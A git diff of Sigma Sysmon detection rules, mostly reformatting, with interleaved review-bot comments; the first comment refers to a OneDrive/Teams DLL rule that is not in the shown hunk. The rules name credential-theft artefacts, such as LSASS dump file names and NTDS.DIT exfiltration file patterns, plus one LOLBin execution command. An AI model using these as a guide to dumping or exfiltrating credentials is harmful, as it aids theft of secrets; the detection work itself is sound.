a/sigma/sysmon/file/file_event/file_event_win_iso_file_mount.yml +++ b/sigma/sysmon/file/file_event/file_event_win_iso_file_mount.yml 
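Review bot: The rewritten description's first sentence is incomplete — `Detects creation of a malicious DLL file in the location where the OneDrive or Team applications` has no verb — and `Team` should be `Teams`; suggest `Detects creation of a malicious DLL file in the location where the OneDrive or Teams applications are installed.` The second sentence could also state the effect plainly, `... the dropped malicious DLL file ("iphlpapi.dll") is sideloaded by the legitimate application`, which is what the reference describes.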
@@ -1,8 +1,7 @@ title: ISO File Created Within Temp Folders id: 2f9356ae-bf43-41b8-b858-4496d83b2acb status: test -description: Detects the creation of a ISO file in the Outlook temp folder or in the - Appdata temp folder. Typical of Qakbot TTP from end-July 2022. +description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022. references: - https://twitter.com/Sam0x90/status/1552011547974696960 - https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html diff --git a/sigma/sysmon/file/file_event/file_event_win_iso_file_recent.yml b/sigma/sysmon/file/file_event/file_event_win_iso_file_recent.yml index 024566e8a..e50c524c0 100644 --- a/sigma/sysmon/file/file_event/file_event_win_iso_file_recent.yml +++ b/sigma/sysmon/file/file_event/file_event_win_iso_file_recent.yml @@ -1,13 +1,9 @@ title: ISO or Image Mount Indicator in Recent Files id: 4358e5a5-7542-4dcb-b9f3-87667371839b status: test -description: 'Detects the creation of recent element file that points to an .ISO, - .IMG, .VHD or .VHDX file as often used in phishing attacks. - - This can be a false positive on server systems but on workstations users should - rarely mount .iso or .img files. - - ' +description: | + Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. + This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. references: - https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore 
diff --git a/sigma/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml b/sigma/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml index 86062d42a..8c85b9788 100644 --- a/sigma/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml +++ b/sigma/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml @@ -1,13 +1,12 @@ title: GatherNetworkInfo.VBS Reconnaissance Script Output id: f92a6f1e-a512-4a15-9735-da09e78d7273 related: - - id: 575dce0c-8139-4e30-9295-1ee75969f7fe - type: similar - - id: 07aa184a-870d-413d-893a-157f317f6f58 - type: similar + - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN + type: similar + - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp + type: similar status: test -description: Detects creation of files which are the results of executing the built-in - reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". +description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". references: - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government diff --git a/sigma/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml b/sigma/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml index ca023c1be..ed4332742 100644 --- a/sigma/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml +++ b/sigma/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml 
@@ -1,14 +1,12 @@ title: LSASS Process Memory Dump Files id: a5a2d357-1ab8-4675-a967-ef9990a59391 related: - - id: db2110f3-479d-42a6-94fb-d35bc1e46492 - type: obsoletes - - id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a - type: obsoletes + - id: db2110f3-479d-42a6-94fb-d35bc1e46492 + type: obsoletes + - id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a + type: obsoletes status: experimental -description: Detects creation of files with names used by different memory dumping - tools to create a memory dump of the LSASS process memory, which contains user - credentials. +description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. references: - https://www.google.com/search?q=procdump+lsass - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf @@ -37,11 +35,11 @@ detection: - \lsass.rar - \Andrew.dmp - \Coredump.dmp - - \NotLSASS.zip - - \PPLBlade.dmp + - \NotLSASS.zip # https://github.com/CCob/MirrorDump + - \PPLBlade.dmp # https://github.com/tastypepperoni/PPLBlade selection_2: TargetFilename|contains: - - \lsass_2 + - \lsass_2 # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp - \lsassdump - \lsassdmp selection_3: diff --git a/sigma/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml b/sigma/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml index 63cf34c49..14d39d4f6 100644 --- a/sigma/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml +++ b/sigma/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml 
@@ -1,9 +1,7 @@ title: LSASS Process Dump Artefact In CrashDumps Folder id: 6902955a-01b7-432c-b32a-6f5f81d8f625 status: test -description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. - This could be a sign of LSASS credential dumping. Techniques such as the LSASS - Shtinkering have been seen abusing the Windows Error Reporting to dump said process. +description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf @@ -26,7 +24,6 @@ detection: TargetFilename|endswith: .dmp condition: file_event and selection falsepositives: - - Rare legitimate dump of the process by the operating system due to a crash of - lsass + - Rare legitimate dump of the process by the operating system due to a crash of lsass level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml b/sigma/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml index 9974180a7..e698267cc 100644 --- a/sigma/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml +++ b/sigma/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml 
@@ -1,8 +1,7 @@ title: WerFault LSASS Process Memory Dump id: c3e76af5-4ce0-4a14-9c9a-25ceb8fda182 status: test -description: Detects WerFault creating a dump file with a name that indicates that - the dump file could be an LSASS process memory, which contains user credentials +description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials references: - https://github.com/helpsystems/nanodump author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_mal_adwind.yml b/sigma/sysmon/file/file_event/file_event_win_mal_adwind.yml index 97a91ea6e..0b5493b85 100644 --- a/sigma/sysmon/file/file_event/file_event_win_mal_adwind.yml +++ b/sigma/sysmon/file/file_event/file_event_win_mal_adwind.yml @@ -1,8 +1,8 @@ title: Adwind RAT / JRAT File Artifact id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 related: - - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 - type: derived + - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 + type: derived status: test description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: @@ -24,12 +24,12 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|contains|all: - - \AppData\Roaming\Oracle\bin\java - - .exe - - TargetFilename|contains|all: - - \Retrive - - .vbs + - TargetFilename|contains|all: + - \AppData\Roaming\Oracle\bin\java + - .exe + - TargetFilename|contains|all: + - \Retrive + - .vbs condition: file_event and selection level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml b/sigma/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml index 2ca82af8c..35924415a 100644 --- a/sigma/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml +++ b/sigma/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml 
@@ -1,8 +1,7 @@ title: File Creation In Suspicious Directory By Msdt.EXE id: 318557a5-150c-4c8d-b70e-a9910e199857 status: test -description: Detects msdt.exe creating files in suspicious directories which could - be a sign of exploitation of either Follina or Dogwalk vulnerabilities +description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities references: - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ diff --git a/sigma/sysmon/file/file_event/file_event_win_net_cli_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_net_cli_artefact.yml index 5080ec0cc..4e85ade73 100644 --- a/sigma/sysmon/file/file_event/file_event_win_net_cli_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_net_cli_artefact.yml 
@@ -1,14 +1,12 @@ title: Suspicious DotNET CLR Usage Log Artifact id: e0b06658-7d1d-4cd3-bf15-03467507ff7c related: - - id: 4508a70e-97ef-4300-b62b-ff27992990ea - type: derived - - id: e4b63079-6198-405c-abd7-3fe8b0ce3263 - type: obsoletes + - id: 4508a70e-97ef-4300-b62b-ff27992990ea + type: derived + - id: e4b63079-6198-405c-abd7-3fe8b0ce3263 + type: obsoletes status: test -description: Detects the creation of Usage Log files by the CLR (clr.dll). These files - are named after the executing process once the assembly is finished executing - for the first time in the (user) session context. +description: Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context. references: - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/ - https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml @@ -41,15 +39,15 @@ detection: - \UsageLogs\wscript.exe.log - \UsageLogs\wmic.exe.log filter_main_rundll32: + # This filter requires the event to be enriched by additional information such as ParentImage and CommandLine activity ParentImage|endswith: \MsiExec.exe ParentCommandLine|contains: ' -Embedding' Image|endswith: \rundll32.exe - CommandLine|contains|all: + CommandLine|contains|all: - Temp - zzzzInvokeManagedCustomActionOutOfProc condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and - msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675 + - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675 level: high ruletype: Sigma 
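Review bot: The enrichment requirement for `filter_main_rundll32` in the second hunk is recorded only as an inline comment, whereas sibling rules in this same commit (`file_event_win_ntds_dit_uncommon_parent_process.yml`, `file_event_win_office_macro_files_from_susp_process.yml`) carry it in `logsource.definition`, which is the field tooling and rule consumers actually surface. For consistency add a definition entry such as `definition: 'Requirements: The "ParentImage", "ParentCommandLine" and "CommandLine" fields are not available by default on EID 11 of Sysmon logs. The filter_main_rundll32 filter only applies when the log is enriched with that data'` under `logsource` (outside this hunk). It is worth stating in that text that without enrichment the filter never matches, so the rule still fires on the msiexec custom-action case listed under `falsepositives`. The changed `CommandLine|contains|all:` line appears to differ only in trailing whitespace; if so it could be dropped from the patch.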
diff --git a/sigma/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml b/sigma/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml index 428afe572..705bc2296 100644 --- a/sigma/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml +++ b/sigma/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml @@ -1,10 +1,7 @@ title: Suspicious File Creation In Uncommon AppData Folder id: d7b50671-d1ad-4871-aa60-5aa5b331fe04 status: test -description: Detects the creation of suspicious files and folders inside the user's - AppData folder but not inside any of the common and well known directories (Local, - Romaing, LocalLow). This method could be used as a method to bypass detection - who exclude the AppData folder in fear of FPs +description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -25,6 +22,7 @@ detection: TargetFilename|startswith: C:\Users\ TargetFilename|contains: \AppData\ TargetFilename|endswith: + # Add more as needed - .bat - .cmd - .cpl diff --git a/sigma/sysmon/file/file_event/file_event_win_new_scr_file.yml b/sigma/sysmon/file/file_event/file_event_win_new_scr_file.yml index 245b8a679..5fc3bb533 100644 --- a/sigma/sysmon/file/file_event/file_event_win_new_scr_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_new_scr_file.yml 
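Review bot: The reflowed `description` in the first hunk keeps two wording defects worth fixing while the line is being touched: "Romaing" should be "Roaming", and "This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs" reads better as "This technique could be used to bypass detections that exclude the AppData folder for fear of false positives". Suggested line: `description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Roaming, LocalLow). This technique could be used to bypass detections that exclude the AppData folder for fear of false positives`. The `# Add more as needed` comment in the second hunk would be more useful if it named what to add, e.g. `# Add more script/executable extensions as needed`.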
@@ -1,9 +1,7 @@ title: SCR File Write Event id: c048f047-7e2a-4888-b302-55f509d4a91d status: experimental -description: Detects the creation of screensaver files (.scr) outside of system folders. - Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" - for example. +description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. references: - https://lolbas-project.github.io/lolbas/Libraries/Desk/ author: Christopher Peacock @securepeacock, SCYTHE @scythe_io @@ -28,7 +26,7 @@ detection: - :\Windows\System32\ - :\Windows\SysWOW64\ - :\Windows\WinSxS\ - - :\WUDownloadCache\ + - :\WUDownloadCache\ # Windows Update Download Cache condition: file_event and (selection and not filter) falsepositives: - The installation of new screen savers by third party software diff --git a/sigma/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml index c0071e31d..a0f4fbbd0 100644 --- a/sigma/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via Notepad++ Plugins id: 54127bd4-f541-4ac3-afdb-ea073f63f692 status: test -description: Detects creation of new ".dll" files inside the plugins directory of - a notepad++ installation by a process other than "gup.exe". Which could indicates - possible persistence +description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence references: - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -25,6 +23,7 @@ detection: filter_gup: Image|endswith: \Notepad++\updater\gup.exe filter_install: + # This filter is for Sigma dataset you could remove it or change when using the rule in your own env Image|startswith: C:\Users\ Image|contains: \AppData\Local\Temp\ Image|endswith: diff --git a/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml b/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml index ad4a67c45..829031fe8 100644 --- a/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml +++ b/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml @@ -1,11 +1,10 @@ title: NTDS.DIT Creation By Uncommon Parent Process id: 4e7050dd-e548-483f-b7d6-527ab4fa784d related: - - id: 11b1ed55-154d-4e82-8ad7-83739298f720 - type: similar + - id: 11b1ed55-154d-4e82-8ad7-83739298f720 + type: similar status: test -description: Detects creation of a file named "ntds.dit" (Active Directory Database) - by an uncommon parent process or directory +description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory references: - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ @@ -21,9 +20,7 @@ tags: logsource: product: windows category: file_event - definition: 'Requirements: The "ParentImage" field is not available by default - on EID 11 of Sysmon logs. To be able to use this rule to the full extent you - need to enrich the log with additional ParentImage data' + definition: 'Requirements: The "ParentImage" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enrich the log with additional ParentImage data' detection: file_event: EventID: 11 
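Review bot: The new comment on `filter_install` in the Notepad++ hunk describes a filter that excludes images running from `C:\Users\...\AppData\Local\Temp\`, which is also a common staging location for unwanted software, so the exclusion is a coverage gap rather than a benign dataset tweak; the comment should say so explicitly instead of only "you could remove it". Suggested wording: `# Note: This filter exists for the Sigma test dataset. It excludes installers running from the user Temp folder, which weakens coverage; remove or tighten it (e.g. on the exact installer name) in production`. The comment text also needs a comma or period after "dataset" to parse as a sentence. The `Image|endswith:` list that the filter relies on continues past the hunk, so the actual exclusion scope is not fully visible here.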
@@ -31,6 +28,7 @@ detection: selection_file: TargetFilename|endswith: \ntds.dit selection_process_parent: + # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11 ParentImage|endswith: - \cscript.exe - \httpd.exe @@ -41,6 +39,7 @@ detection: - \w3wp.exe - \wscript.exe selection_process_parent_path: + # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11 ParentImage|contains: - \apache - \tomcat diff --git a/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml b/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml index a17e32ccc..2fbb5e4bd 100644 --- a/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml +++ b/sigma/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml @@ -1,11 +1,10 @@ title: NTDS.DIT Creation By Uncommon Process id: 11b1ed55-154d-4e82-8ad7-83739298f720 related: - - id: 4e7050dd-e548-483f-b7d6-527ab4fa784d - type: similar + - id: 4e7050dd-e548-483f-b7d6-527ab4fa784d + type: similar status: test -description: Detects creation of a file named "ntds.dit" (Active Directory Database) - by an uncommon process or a process located in a suspicious directory +description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory references: - https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/ - https://adsecurity.org/?p=2398 @@ -28,6 +27,7 @@ detection: TargetFilename|endswith: \ntds.dit selection_process_img: Image|endswith: + # Add more suspicious processes as you see fit - \cmd.exe - \cscript.exe - \mshta.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml b/sigma/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml index a3e760b97..396f4434d 100644 --- a/sigma/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml 
+++ b/sigma/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml @@ -1,8 +1,7 @@ title: NTDS Exfiltration Filename Patterns id: 3a8da4e0-36c1-40d2-8b29-b3e890d5172a status: test -description: Detects creation of files with specific name patterns seen used in various - tools that export the NTDS.DIT for exfiltration. +description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. references: - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1 @@ -23,8 +22,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetFilename|endswith: - - \All.cab - - .ntds.cleartext + - \All.cab # https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1 + - .ntds.cleartext # https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405 condition: file_event and selection falsepositives: - Unknown diff --git a/sigma/sysmon/file/file_event/file_event_win_office_addin_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_office_addin_persistence.yml index e4a81b32d..6e362525e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_addin_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_addin_persistence.yml 
@@ -1,8 +1,7 @@ title: Potential Persistence Via Microsoft Office Add-In id: 8e1cb247-6cf6-42fa-b440-3f27d57e9936 status: test -description: Detects potential persistence activity via startup add-ins that load - when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). +description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). references: - Internal Research - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence diff --git a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_created.yml b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_created.yml index d529a72f7..e2a318277 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_created.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_created.yml @@ -1,8 +1,8 @@ title: Office Macro File Creation id: 91174a41-dc8f-401b-be89-7bfc140612a0 related: - - id: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 - type: similar + - id: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 + type: similar status: test description: Detects the creation of a new office macro files on the systems references: diff --git a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml index 54b196354..bf6940106 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml 
@@ -1,11 +1,10 @@ title: Office Macro File Download id: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 related: - - id: 91174a41-dc8f-401b-be89-7bfc140612a0 - type: similar + - id: 91174a41-dc8f-401b-be89-7bfc140612a0 + type: similar status: experimental -description: Detects the creation of a new office macro files on the systems via an - application (browser, mail client). +description: Detects the creation of a new office macro files on the systems via an application (browser, mail client). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md - https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference @@ -25,9 +24,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_processes: Image|endswith: - - \RuntimeBroker.exe + # Email clients + - \RuntimeBroker.exe # Windows Email clients uses RuntimeBroker to create the files - \outlook.exe - \thunderbird.exe + # Browsers - \brave.exe - \chrome.exe - \firefox.exe @@ -42,20 +43,20 @@ detection: - \vivaldi.exe - \whale.exe selection_ext: - - TargetFilename|endswith: - - .docm - - .dotm - - .xlsm - - .xltm - - .potm - - .pptm - - TargetFilename|contains: - - .docm:Zone - - .dotm:Zone - - .xlsm:Zone - - .xltm:Zone - - .potm:Zone - - .pptm:Zone + - TargetFilename|endswith: + - .docm + - .dotm + - .xlsm + - .xltm + - .potm + - .pptm + - TargetFilename|contains: + - .docm:Zone + - .dotm:Zone + - .xlsm:Zone + - .xltm:Zone + - .potm:Zone + - .pptm:Zone condition: file_event and (all of selection_*) falsepositives: - Legitimate macro files downloaded from the internet diff --git a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml index 8d342c450..d3e84e1c0 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml 
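Review bot: The new inline comment on `\RuntimeBroker.exe` in the second hunk has a grammar slip and asserts more than the rule needs: "Windows Email clients uses RuntimeBroker to create the files" should read `# The Windows Mail client writes attachments via RuntimeBroker.exe` or, if the exact client is not known, `# Some Windows store email clients create the files via RuntimeBroker.exe`. Because `RuntimeBroker.exe` brokers file access for UWP apps generally, a reader may otherwise assume the match is specific to mail. The `description` reflowed in the first hunk still has "a new office macro files"; `Detects the creation of new Office macro files on the system via an application (browser, mail client).` fixes the number agreement.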
+++ b/sigma/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml @@ -15,26 +15,25 @@ tags: logsource: category: file_event product: windows - definition: 'Requirements: The "ParentImage" field is not available by default - on EID 11 of Sysmon logs. To be able to use this rule to the full extent you - need to enriche the log with additional ParentImage data' + definition: 'Requirements: The "ParentImage" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enriche the log with additional ParentImage data' detection: file_event: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - Image|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentImage|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe + - Image|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11 + - ParentImage|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe selection_ext: TargetFilename|endswith: - .docm diff --git a/sigma/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml b/sigma/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml index 43ec4cbb7..95ecdbe27 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml 
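Review bot: The reflowed `logsource.definition` in this hunk keeps the typo "enriche"; the sibling rule `file_event_win_ntds_dit_uncommon_parent_process.yml` in this same commit spells it "enrich", so the two should be aligned: `definition: 'Requirements: The "ParentImage" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enrich the log with additional ParentImage data'`. The added `# Note: ParentImage is a custom field ...` comment above the second `selection_cmd` alternative then duplicates the definition; one place is enough, and the definition is the one tooling surfaces.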
@@ -1,8 +1,7 @@ title: OneNote Attachment File Dropped In Suspicious Location id: 7fd164ba-126a-4d9c-9392-0d4f7c243df0 status: experimental -description: Detects creation of files with the ".one"/".onepkg" extension in suspicious - or uncommon locations. This could be a sign of attackers abusing OneNote attachments +description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments references: - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/ - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ @@ -21,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetFilename|contains: + # Note: add more common locations for drops such as download folders and the like. Or baseline legitimate locations and alert on everything else - \AppData\Local\Temp\ - \Users\Public\ - \Windows\Temp\ diff --git a/sigma/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml b/sigma/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml index 0fe7f5796..738f027d8 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml 
@@ -1,9 +1,7 @@ title: Suspicious File Created Via OneNote Application id: fcc6d700-68d9-4241-9a1a-06874d621b06 status: test -description: Detects suspicious files created via the OneNote application. This could - indicate a potential malicious ".one"/".onepkg" file was executed as seen being - used in malware activity in the wild +description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild references: - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/ - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ @@ -31,6 +29,7 @@ detection: - \onenoteim.exe TargetFilename|contains: \AppData\Local\Temp\OneNote\ TargetFilename|endswith: + # TODO: Add more suspicious extensions - .bat - .chm - .cmd @@ -47,9 +46,7 @@ detection: - .wsf condition: file_event and selection falsepositives: - - False positives should be very low with the extensions list cited. Especially - if you don't heavily utilize OneNote. - - Occasional FPs might occur if OneNote is used internally to share different - embedded documents + - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote. + - Occasional FPs might occur if OneNote is used internally to share different embedded documents level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml b/sigma/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml index f5efaed6c..152036c4b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml 
